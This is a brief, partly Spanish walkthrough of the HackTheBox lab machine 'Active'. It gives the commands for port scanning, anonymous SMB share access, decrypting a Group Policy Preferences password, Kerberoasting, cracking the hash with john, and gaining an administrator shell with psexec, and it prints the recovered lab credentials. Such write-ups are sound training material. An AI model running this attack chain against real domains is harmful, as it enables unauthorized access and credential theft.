echo "10.129.159.31 active.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.159.31 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA active 10.129.159.31

nmap -sU -O -p- -oA active-udp 10.129.159.31

nikto -h 10.129.159.31:80

Pasted image 20210527124749.png

Pasted image 20210527124813.png

Pasted image 20210527124847.png

Pasted image 20210527124933.png

Pasted image 20210527125036.png

smbmap -H active.htb

Pasted image 20210527125630.png

smbclient //active.htb/Replication -N

Como podemos ver el share de Replication esta disponible y se puede leer Despues de buscar en los archivos encontramos uno llamado Group.xml

Pasted image 20210527130405.png

Pasted image 20210527130529.png

get Groups.xml

Pasted image 20210527130613.png

Kali tiene un porgrama para desencriptar cualquier texto de GPP encriptado.

Pasted image 20210527130922.png

Conseguimos las siguientes credenciales:

SVC_TGS:GPPstillStandingStrong2k18

smbclient -W active.htb -U SVC_TGS //active.htb/USERS

Podemos ver que esto es una maquina con Kerberos. Si usted adquiere las credenciales de un usuario con ticket granting ticket o TGT entonces usted puede pedir uno o mas servicios del ticket granting service o TGS para cualquier service principal name (SPN).

Pasted image 20210527132602.png Pasted image 20210527134713.png

john --wordlist=/usr/share/wordlists/rockyou.txt active_hash.txt

Pasted image 20210527134901.png

python3 /opt/impacket/examples/psexec.py active.htb/Administrator:Ticketmaster1968@active.htb

Pasted image 20210527135130.png

boxes

copyright©2022 Cu3rv0x all rights reserved